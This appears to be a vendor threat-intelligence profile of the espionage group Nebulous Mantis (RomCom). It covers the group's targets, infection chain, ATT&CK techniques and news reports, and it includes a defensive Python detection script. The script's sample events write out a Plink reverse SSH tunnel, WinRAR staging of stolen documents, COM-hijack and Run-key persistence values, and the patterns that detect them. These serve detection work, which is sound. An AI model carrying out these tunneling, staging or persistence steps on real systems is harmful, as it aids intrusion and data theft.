
Nebulous Mantis

Also known as: Nebulous Mantis

Nebulous Mantis is a Russian-speaking, Russia-linked cyber espionage group active since at least mid-2019. It is tracked under multiple aliases including RomCom, Cuba, STORM-0978, Tropical Scorpius, UNC2596, CIGAR, and Void Rabisu. Reporting describes the group as targeting government entities, critical infrastructure, political figures, and NATO-related defense organizations, and as blending espionage activity with ransomware operations. The group initially used the Hancitor loader and pivoted to RomCom RAT in mid-2022.

Its operations commonly begin with spear-phishing emails containing malicious links or weaponized documents, including lures impersonating trusted services such as OneDrive and fake PDF downloads. The infection chain includes staged payload delivery, such as Keyprov.dll, followed by RomCom backdoors and a final-stage C++ implant. RomCom uses encrypted command-and-control, living-off-the-land techniques, decentralized infrastructure including IPFS, and persistence via COM hijacking and other registry manipulation. Reported evasion includes anti-sandbox checks, time zone analysis, file renaming, and frequently rotated infrastructure.

Post-compromise activity includes credential harvesting, system and network reconnaissance, Active Directory and domain enumeration, lateral movement, and data collection and staging for exfiltration. Reported tooling includes Plink for SSH tunneling, WinRAR for archiving, AD Explorer for domain enumeration, renamed Sysinternals tools, and reverse SSH tunnels. Data exfiltration is conducted over encrypted C2 channels, with archives staged in locations such as C:\Users\Public\Music. Reporting states the group frequently deploys ransomware after exfiltration to obscure espionage activity. Associated ransomware brands include Cuba ransomware, Industrial Spy, and Team Underground.

PRODAFT also linked infrastructure procurement and management to an individual tracked as LARVA-290, including use of bulletproof hosting providers such as LuxHost and AEZA.
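A defender-side triage check, added here as an example and not part of this profile or of any Mallory tooling: it runs over constructed Sysmon-style events and flags the tradecraft reported above (archives staged under C:\Users\Public\Music, Plink SSH tunnels, a CLSID InprocServer32 value repointed to a user-writable DLL, Run-key persistence). The event shape, the CLSID placeholder, the sample paths and the IP are assumptions.

```python
import re

# Constructed Sysmon-style events (id 1 = process create, 11 = file create,
# 13 = registry value set). Sample data only, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "cmd": r"plink.exe -N -R 2222:127.0.0.1:3389 user@198.51.100.7"},
    {"id": 1, "cmd": r"WinRAR.exe a -r C:\Users\Public\Music\docs.rar C:\Users\j.doe\Documents"},
    {"id": 11, "target": r"C:\Users\Public\Music\docs.rar"},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Classes\CLSID\{PLACEHOLDER-CLSID}\InprocServer32\(Default)",
     "details": r"C:\Users\Public\Keyprov.dll"},        # staged payload name reported for this actor
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\Public\Music\svc.exe"},
    {"id": 13, "target": r"HKLM\Software\Classes\CLSID\{PLACEHOLDER-CLSID}\InprocServer32\(Default)",
     "details": r"C:\Windows\System32\shell32.dll"},     # benign: system DLL, not user-writable
    {"id": 1, "cmd": "notepad.exe"},
]

STAGING = re.compile(r"^C:\\Users\\Public\\Music\\.*\.(rar|zip|7z)$", re.I)
COM_INPROC = re.compile(r"\\Software\\Classes\\CLSID\\\{[^}]+\}\\InprocServer32", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
PLINK_TUNNEL = re.compile(r"\bplink(\.exe)?\b.*\s-[RLD]\s", re.I)   # -R/-L/-D port forwards
ARCHIVER = re.compile(r"\b(winrar|rar)(\.exe)?\b\s+a\b", re.I)      # "a" = add to archive
USER_WRITABLE = re.compile(r"^C:\\(Users|ProgramData)\\", re.I)

def classify(ev):
    """Return the ATT&CK technique IDs an event matches (empty list if none)."""
    hits = []
    if ev["id"] == 1:
        if PLINK_TUNNEL.search(ev["cmd"]):
            hits.append("T1572")          # protocol tunneling via Plink
        if ARCHIVER.search(ev["cmd"]):
            hits.append("T1560.001")      # archive via utility (WinRAR)
            if "\\Users\\Public\\Music\\" in ev["cmd"]:
                hits.append("T1074")      # archive written to the reported staging dir
    elif ev["id"] == 11 and STAGING.search(ev["target"]):
        hits.append("T1074")
    elif ev["id"] == 13:
        if COM_INPROC.search(ev["target"]) and USER_WRITABLE.search(ev["details"]):
            hits.append("T1546.015")      # COM hijack: InprocServer32 -> user-writable DLL
        if RUN_KEY.search(ev["target"]):
            hits.append("T1547.001")      # Run key persistence
    return hits

def scan(events):
    """Map technique ID -> count of matching events, for a quick triage summary."""
    summary = {}
    for ev in events:
        for t in classify(ev):
            summary[t] = summary.get(t, 0) + 1
    return summary
```

The COM rule deliberately ignores InprocServer32 values that point into C:\Windows, so only hijacks into user-writable paths surface.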

OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

  • government
  • defense
  • critical-infrastructure

MITRE ATT&CK

Tradecraft

24 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics, 32 techniques. ×N = number of intelligence reports citing this technique.

TA0001 Initial Access (1 technique)

  • T1566 Phishing
      • T1566.001 Spearphishing Attachment
      • T1566.002 Spearphishing Link

TA0003 Persistence (2 techniques)

  • T1546 Event Triggered Execution
      • T1546.015 Component Object Model Hijacking (×2)
  • T1547 Boot or Logon Autostart Execution
      • T1547.001 Registry Run Keys / Startup Folder (×2)

TA0004 Privilege Escalation (2 techniques)

  • T1546 Event Triggered Execution
      • T1546.015 Component Object Model Hijacking (×2)
  • T1547 Boot or Logon Autostart Execution
      • T1547.001 Registry Run Keys / Startup Folder (×2)

TA0005 Stealth (2 techniques)

  • T1036 Masquerading
  • T1497 Virtualization/Sandbox Evasion (×2)

TA0006 Credential Access (1 technique)

  • T1555 Credentials from Password Stores

TA0007 Discovery (6 techniques)

  • T1016 System Network Configuration Discovery
  • T1018 Remote System Discovery
  • T1082 System Information Discovery (×2)
  • T1083 File and Directory Discovery
  • T1482 Domain Trust Discovery (×2)
  • T1497 Virtualization/Sandbox Evasion (×2)

TA0008 Lateral Movement (1 technique)

  • T1021 Remote Services
      • T1021.004 SSH

TA0009 Collection (3 techniques)

  • T1005 Data from Local System
  • T1074 Data Staged
  • T1560 Archive Collected Data
      • T1560.001 Archive via Utility

TA0011 Command and Control (4 techniques)

  • T1105 Ingress Tool Transfer (×3)
  • T1568 Dynamic Resolution
  • T1572 Protocol Tunneling
  • T1573 Encrypted Channel (×2)

TA0010 Exfiltration (1 technique)

  • T1041 Exfiltration Over C2 Channel (×2)

TA0040 Impact (1 technique)

  • T1486 Data Encrypted for Impact (×2)

IOCS

Observables

1 indicator attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

cloudatg insights · News · Feb 13, 2026
AI Development & Software Engineering | CloudATG

Russian-speaking espionage group using RomCom RAT in multi-stage intrusions against NATO-linked entities, with LOTL and encrypted C2 noted.

security online info · News · May 3, 2025
Nebulous Mantis Cyber Espionage Group: RomCom RAT and Hybrid Tactics

Hybrid espionage + ransomware operations since mid-2019. Uses multi-phase intrusions starting with spear-phishing, then RomCom RAT for execution/persistence/C2, credential harvesting, discovery, and data exfiltration; often deploys ransomware to cover tracks.

the hacker news · News · Apr 30, 2025
Nebulous Mantis Targets NATO-Linked Entities with Multi-Stage Malware Attacks

Russian-speaking espionage-focused intrusion set using spear-phishing to deliver RomCom RAT, leveraging bulletproof hosting and encrypted C2; targets critical infrastructure, government, political leaders, and NATO-related defense organizations; conducts credential theft, AD enumeration, lateral movement, and data collection/exfiltration.

securityaffairs · News · Apr 30, 2025
Russia-linked group Nebulous Mantis targets NATO-related defense organizations

Russia-linked, Russian-speaking espionage-focused intrusion set targeting NATO-related defense organizations and other critical entities. Uses spear-phishing to deliver RomCom for espionage, lateral movement, credential theft, AD/domain enumeration, and data exfiltration; commonly follows theft with ransomware deployment to cover activity and monetize/impact victims.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping (24)

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal (7)

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables (1)

Domains, IPs, and hashes tied to this actor, refreshed continuously.